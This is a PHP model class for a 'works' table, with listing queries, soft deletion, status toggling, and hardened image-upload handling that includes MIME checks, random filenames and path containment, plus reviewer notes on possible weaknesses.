Viewing: Work.php
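<?php

/**
 * Model for the `works` table: listing queries, soft delete, status toggling
 * and storage of the image attached to a work.
 *
 * `$this->db`, `create()` and `update()` come from BaseModel, which is not
 * visible here. The query code below only relies on `$this->db` offering
 * `query()` / `prepare()` that return a statement with `execute()`, `fetch()`
 * and `fetchAll()` (PDO-like — confirm against BaseModel).
 */
class Work extends BaseModel
{
    /** Upload directory for work images, relative to ROOT_PATH. */
    private const UPLOAD_DIR = 'storage/uploads/works';

    /**
     * Accepted image MIME types mapped to the extension written to disk.
     * The stored extension always comes from this map, never from the
     * client-supplied file name.
     */
    private const IMAGE_TYPES = [
        'image/jpeg' => 'jpg',
        'image/png' => 'png',
        'image/webp' => 'webp',
    ];

    protected string $table = 'works';

    // NOTE(review): 'status', 'updated_at' and 'deleted_at' are listed because
    // updateWork()/softDelete()/toggleStatus() write them through update().
    // Presumably BaseModel uses this list as a mass-assignment allowlist; if so,
    // callers that forward raw request data to createWork()/updateWork() can
    // also set these columns — confirm the controllers pass an explicit subset.
    protected array $fillable = [
        'title',
        'description',
        'image_path',
        'location',
        'category',
        'is_featured',
        'status',
        'order_position',
        'updated_at',
        'deleted_at',
    ];

    /**
     * Return every work that has not been soft-deleted, ordered by
     * order_position and then newest first.
     */
    public function getAll(): array
    {
        $statement = $this->db->query('SELECT * FROM works WHERE deleted_at IS NULL ORDER BY order_position ASC, created_at DESC');

        return $statement->fetchAll();
    }

    /**
     * Return the works shown publicly: not soft-deleted and with status
     * 'activo', featured rows first.
     */
    public function getPublic(): array
    {
        $statement = $this->db->query("SELECT * FROM works WHERE deleted_at IS NULL AND status = 'activo' ORDER BY is_featured DESC, order_position ASC, created_at DESC");

        return $statement->fetchAll();
    }

    /**
     * Fetch one non-deleted work by id.
     *
     * The id is bound as a named parameter, not interpolated into the SQL.
     *
     * @return array|null The row, or null when fetch() yields nothing.
     */
    public function getById(int $id): ?array
    {
        $statement = $this->db->prepare('SELECT * FROM works WHERE id = :id AND deleted_at IS NULL LIMIT 1');
        $statement->execute(['id' => $id]);

        return $statement->fetch() ?: null;
    }

    /**
     * Insert a work by delegating to BaseModel::create().
     *
     * @return int Whatever create() returns (presumably the new row id — confirm).
     */
    public function createWork(array $data): int
    {
        return $this->create($data);
    }

    /**
     * Update a work, stamping updated_at with the current server time.
     * Any 'updated_at' supplied by the caller is overwritten.
     */
    public function updateWork(int $id, array $data): bool
    {
        $data['updated_at'] = date('Y-m-d H:i:s');

        return $this->update($id, $data);
    }

    /**
     * Soft-delete a work: set deleted_at to now and status to 'inactivo'.
     * The row and its image file are left in place.
     */
    public function softDelete(int $id): bool
    {
        return $this->update($id, [
            'deleted_at' => date('Y-m-d H:i:s'),
            'status' => 'inactivo',
        ]);
    }

    /**
     * Flip a work between 'activo' and 'inactivo'.
     *
     * Any current status other than 'activo' becomes 'activo'. The read and
     * the write are separate statements, so concurrent toggles can race.
     *
     * @return bool False when the work does not exist (or is soft-deleted).
     */
    public function toggleStatus(int $id): bool
    {
        $work = $this->getById($id);
        if (!$work) {
            return false;
        }

        $next = $work['status'] === 'activo' ? 'inactivo' : 'activo';

        return $this->update($id, ['status' => $next]);
    }

    /**
     * List the distinct non-empty categories of non-deleted works, sorted A-Z.
     *
     * @return array Flat list of category values.
     */
    public function categories(): array
    {
        $statement = $this->db->query("SELECT DISTINCT category FROM works WHERE deleted_at IS NULL AND category IS NOT NULL AND category != '' ORDER BY category ASC");

        return array_column($statement->fetchAll(), 'category');
    }

    /**
     * Store an uploaded image and return its path relative to ROOT_PATH.
     *
     * The file is written under a server-generated name (timestamp plus
     * 6 random bytes) with an extension chosen from the detected MIME type,
     * so nothing from the client-supplied name reaches the file system.
     * move_uploaded_file() itself refuses paths that are not genuine PHP
     * uploads. The previous image is removed only after the new one is saved.
     *
     * Content sniffing only checks the leading bytes; a valid image can still
     * carry trailing data, so the upload directory should be served without
     * script execution.
     *
     * @param array       $file    One entry of $_FILES (name, tmp_name, error).
     * @param string|null $oldFile Relative path of the image being replaced.
     *
     * @return string|null Relative path of the stored file, or null when the
     *                     upload is missing, rejected, or could not be saved.
     */
    public function uploadImage(array $file, ?string $oldFile = null): ?string
    {
        if (empty($file['name']) || ($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
            return null;
        }

        if (!$this->validImage($file)) {
            return null;
        }

        // Re-check the detected type here so the map lookup below can never
        // hit a missing key, even if validImage() is overridden or changed.
        $mime = mime_content_type($file['tmp_name']);
        if (!is_string($mime) || !isset(self::IMAGE_TYPES[$mime])) {
            return null;
        }

        $filename = 'work_' . date('YmdHis') . '_' . bin2hex(random_bytes(6)) . '.' . self::IMAGE_TYPES[$mime];
        $directory = ROOT_PATH . '/' . self::UPLOAD_DIR;

        // The second is_dir() covers a concurrent request creating the
        // directory between our check and mkdir().
        if (!is_dir($directory) && !mkdir($directory, 0775, true) && !is_dir($directory)) {
            return null;
        }

        $destination = $directory . '/' . $filename;
        if (!move_uploaded_file($file['tmp_name'], $destination)) {
            return null;
        }

        $this->deleteOldFile($oldFile);

        return self::UPLOAD_DIR . '/' . $filename;
    }

    /**
     * Check that an upload entry is an accepted image.
     *
     * Two checks apply: the client-supplied extension must not be on a small
     * blocklist of script/markup types, and the content-sniffed MIME type must
     * be JPEG, PNG or WebP. The MIME allowlist is the effective control; the
     * extension blocklist is only an early reject and is not exhaustive.
     *
     * NOTE(review): this method does not call is_uploaded_file(); it inspects
     * whatever path is in 'tmp_name'. Pass only entries taken from $_FILES.
     *
     * @param array $file One entry of $_FILES (name, tmp_name, error).
     */
    public function validImage(array $file): bool
    {
        if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
            return false;
        }

        // A malformed entry (missing or non-string keys) is rejected instead
        // of raising warnings or TypeErrors further down.
        $name = $file['name'] ?? '';
        $tmpName = $file['tmp_name'] ?? '';
        if (!is_string($name) || !is_string($tmpName) || $tmpName === '' || !is_file($tmpName)) {
            return false;
        }

        $extension = strtolower(pathinfo($name, PATHINFO_EXTENSION));
        if (in_array($extension, ['php', 'js', 'html', 'svg', 'phtml', 'phar'], true)) {
            return false;
        }

        return in_array(mime_content_type($tmpName), array_keys(self::IMAGE_TYPES), true);
    }

    /**
     * Delete a previously stored image, but only if it resolves to a file
     * inside the works upload directory.
     *
     * realpath() resolves '..' segments and symlinks before the containment
     * check. The base path is compared with a trailing directory separator so
     * that a sibling such as 'storage/uploads/works_old/x.jpg' does not pass
     * as being "inside" 'storage/uploads/works'.
     */
    private function deleteOldFile(?string $path): void
    {
        if (!$path) {
            return;
        }

        $target = realpath(ROOT_PATH . '/' . ltrim($path, '/'));
        $base = realpath(ROOT_PATH . '/' . self::UPLOAD_DIR);
        if ($target === false || $base === false) {
            return;
        }

        $insideBase = str_starts_with($target, rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR);
        if ($insideBase && is_file($target)) {
            unlink($target);
        }
    }
}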